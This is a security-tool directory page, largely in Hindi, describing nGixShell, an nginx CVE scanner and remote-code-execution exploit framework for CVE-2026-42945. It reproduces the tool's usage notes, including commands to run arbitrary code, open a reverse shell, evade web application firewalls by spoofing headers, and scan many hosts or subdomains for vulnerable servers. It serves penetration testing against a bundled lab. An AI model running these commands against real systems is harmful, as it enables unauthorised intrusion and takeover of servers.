Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nGixshell — nginx CVE स्कैनर + RCE शोषण ढाँचा (CVE-2026-42945 + 16 अन्य) | Kitploit
उपकरण/GitHubGitHub/mateusverass/ngixshell
टोहीभेद्यता स्कैनरशोषण फ्रेमवर्कवेब एप्लिकेशन शोषणWAF बाईपासवेब सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलसबडोमेन एनुमरेशनरेड टीमिंगपेलोड डेवलपमेंट
218323 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
mateusverass/ngixshell

nGixshell

nginx CVE स्कैनर + RCE शोषण ढाँचा (CVE-2026-42945 + 16 अन्य)

रिपॉजिटरी देखें
nGixShell

Python CVEs Zero deps License


nGixShell एक nginx CVE स्कैनर और RCE एक्सप्लॉइट फ्रेमवर्क है। यह CVE-2026-42945 (F5/NVD के अनुसार CVSS 3.1 8.1 HIGH) के लिए एक proof-of-concept शिप करता है — जो ngx_http_rewrite_module में एक heap buffer overflow है — और एक स्कैनर जो 64 nginx CVEs को कवर करता है, जिसमें स्वचालित HTTP प्रोब, फिंगरप्रिंटिंग, WAF डिटेक्शन/बायपास, वेब सुरक्षा ऑडिटिंग, और रिपोर्ट जनरेशन शामिल हैं।

शून्य बाहरी निर्भरताएँ। शुद्ध Python 3 stdlib।

एक्सप्लॉइट पूर्वापेक्षाएँ (पहले पढ़ें)। --cmd / --shell केवल तब काम करते हैं जब ये सभी सत्य हों: लक्ष्य x86_64 हो, कमजोर rewrite+set कॉन्फ़िग मौजूद हो, ASLR अक्षम हो, और heap/libc पते उस विशिष्ट बिल्ड के लिए कैलिब्रेट किए गए हों (calibrate.py → --build-file)। देखें Exploit Requirements। स्कैनर स्वयं की ऐसी कोई पूर्वापेक्षा नहीं है।


Quick Start

# Spin up the vulnerable lab (builds nginx from source, ASLR disabled)
docker compose -f env/docker-compose.yml up -d --build

# Auto mode — fingerprint + CVE scan + web audit (works on any arch)
python3 ngixshell.py 127.0.0.1:19321

# RCE — calibrate, restart the worker for a clean heap, then exploit
W=$(pgrep -f 'nginx: worker' | head -1)
sudo python3 calibrate.py 127.0.0.1 19321 "$W" --spray-path /spray \
    --spray-mode full --json -o profile.json
docker compose -f env/docker-compose.yml restart nginx-vuln
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id > /tmp/rce.txt' \
    --build-file profile.json
docker compose -f env/docker-compose.yml exec nginx-vuln cat /tmp/rce.txt

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell --build-file profile.json

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file (one report per target)
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

किसी फ्लैग की आवश्यकता नहीं — टूल को किसी लक्ष्य पर इंगित करने से सब कुछ स्वचालित रूप से चलता है।
TLS स्वतः पहचाना जाता है। server_tokens off के साथ भी nginx का फिंगरप्रिंट लिया जाता है।

system() stdout को कैप्चर नहीं करता: --cmd 'id' चलता है लेकिन कुछ भी वापस प्रिंट नहीं करता। एक ऐसी कमांड का उपयोग करें जिसका कोई देखने योग्य साइड इफेक्ट हो और उसे --verify-url http://target/pwned से पुष्टि करें (HTTP 200 = पुष्ट)।


Usage

python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

Modes

FlagDescription
(none)Auto — fingerprint + CVE scan + web audit
--cmd 'CMD'Execute command via CVE-2026-42945 RCE
--cmd-file FILEExecute commands from file (joined with ;)
--shellPop a reverse shell
--shell-type TYPEPayload: bash python perl php nc powershell (default: python)
--upgrade-shellAuto-send PTY upgrade after shell connects
--verify-url URLAfter a detected crash, fetch URL to confirm the command ran (200 = verified)
--subdomain-scan DOMAINFind vulnerable nginx on subdomains
--cve CVE-IDTest one specific CVE
--list-cvesPrint all 64 CVEs with CVSS and probe info
--list-candidatesPrint heap address candidates
--dry-runFingerprint + scan only, no exploit
--target-file FILEScan multiple hosts from a file

Exploit tuning

FlagDescription
--build-file FILERecommended. JSON calibration profile from calibrate.py --json -o FILE
--offsets SPECComma-separated hex heap offsets from calibrate.py (e.g. 0x5a427,0x60e67)
--heap-base HEX / --libc-base HEX / --system-addr HEXManual address overrides
--build KEYBuilt-in profile (only the DepthFirst lab reference is shipped)
--rewrite-path PATHVulnerable rewrite location (default /api)
--spray-path PATHproxy_pass-backed location used for the POST-body spray (default /upload; the bundled lab uses /spray)
--spray-mode partial|fullpartial: short body + large Content-Length (bundled lab); full: complete body + X-Delay (DepthFirst lab)
--pad-a N / --pad-plus NTrigger-path padding before the + run (defaults 349 / 969, from the vendor PoC)
--continue-on-crashKeep trying the remaining heap candidates after an unverified crash
--tries N / --spray N / --body-len NTrigger attempts per candidate / spray connections / spray body size

WAF Detection & Bypass

FlagDescription
--waf-detectDetect WAF before scanning
--waf-bypassEnable all bypass techniques (also runs detection)
--waf-ip IPSpoof this IP in bypass headers (default: random RFC1918)

Bypass techniques (all active when --waf-bypass is set):

TechniqueDetail
IP spoofingX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
UA rotation11 real browser/bot User-Agents, randomised per request
Path obfuscationdouble-slash, /./ padding, percent-encoding, case variation
Header case shufflerandomises header name casing to break WAF pattern matching

Detected WAFs: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

Web Audit

स्कैन मोड में स्वचालित रूप से चलता है। सभी मॉड्यूल को व्यक्तिगत रूप से छोड़ा जा सकता है।

FlagDescription
--skip-headersSkip HTTP security header audit
--skip-pathsSkip path/file discovery
--skip-vhostsSkip virtual host enumeration
--skip-tlsSkip TLS protocol audit
--path-wordlist FILEExtra paths to probe (one per line)
  • Header audit — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, version-leaking headers
  • Path discovery — 50+ paths; sentinel probe eliminates false positives from catch-all 403/301 rules
  • Virtual host enumeration — requires status AND body diff to avoid default-block false positives
  • TLS audit — tests TLS 1.0–1.3 support, certificate expiry, and self-signed detection
  • stub_status — parses active connection metrics from /nginx_status if exposed

Connection

FlagDescription
--port PORTOverride port
--tlsForce TLS (auto-detected by default)
--proxy URLProxy: http://, https://, socks5://

HTTP

FlagDescription
--user-agent UACustom User-Agent
--auth USER:PASSHTTP Basic auth
--cookie VALUECookie header
--header NAME:VALUEExtra header (repeatable)

Rate / Timing

FlagDescription
--rate-limit RPSMax requests per second
--jitter MSRandom delay 0–MS ms between requests
--retry NRetry inconclusive probes (default: 1)
--timeout-multiplier XScale all timeouts (default: 1.0)

Output

FlagDescription
--output FILEWrite log to FILE
--jsonPrint JSON summary at end (multi-target: {"targets": [...]})
--html-report [FILE]Generate HTML report (one file per target in multi-target mode)
--verboseDebug output
टूल डाउनलोड करें